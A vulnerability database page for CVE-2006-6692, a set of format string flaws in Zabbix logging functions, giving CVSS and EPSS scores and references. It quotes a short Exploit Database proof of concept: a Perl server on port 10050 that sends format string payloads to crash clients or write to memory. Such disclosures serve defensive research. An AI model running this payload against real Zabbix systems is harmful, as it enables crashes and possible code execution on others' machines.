CVE-2006-6692 : Detail

CVE-2006-6692

0.91%V3
Network
2006-12-21
20h00 +00:00
2009-02-26
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple format string vulnerabilities in zabbix before 20061006 allow attackers to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in information that would be recorded in the system log using (1) zabbix_log or (2) zabbix_syslog.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28775

Publication date : 2006-10-08 22h00 +00:00
Author : Max Vozeler
EDB Verified : Yes

source: https://www.securityfocus.com/bid/20416/info ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application. ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well. #!/usr/bin/perl -- # zabbix-exploiter # by Ulf Harnhammar in 2006 # I hereby place this program in the public domain. use IO::Socket; $server = IO::Socket::INET->new( Proto => 'tcp', LocalPort => 10050, Listen => SOMAXCONN, Reuse => 1); die "can't create server\n" if !$server; while ($client = $server->accept()) { $client->autoflush(1); $key = <$client>; print $key; print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing # print $client '%n%n%n%n'; # crashes close $client; }

Products Mentioned

Configuraton 0

Zabbix>>Zabbix >> Version 1.1.2

References

http://www.vupen.com/english/advisories/2006/3959
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/20416
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/22313
Tags : third-party-advisory, x_refsource_SECUNIA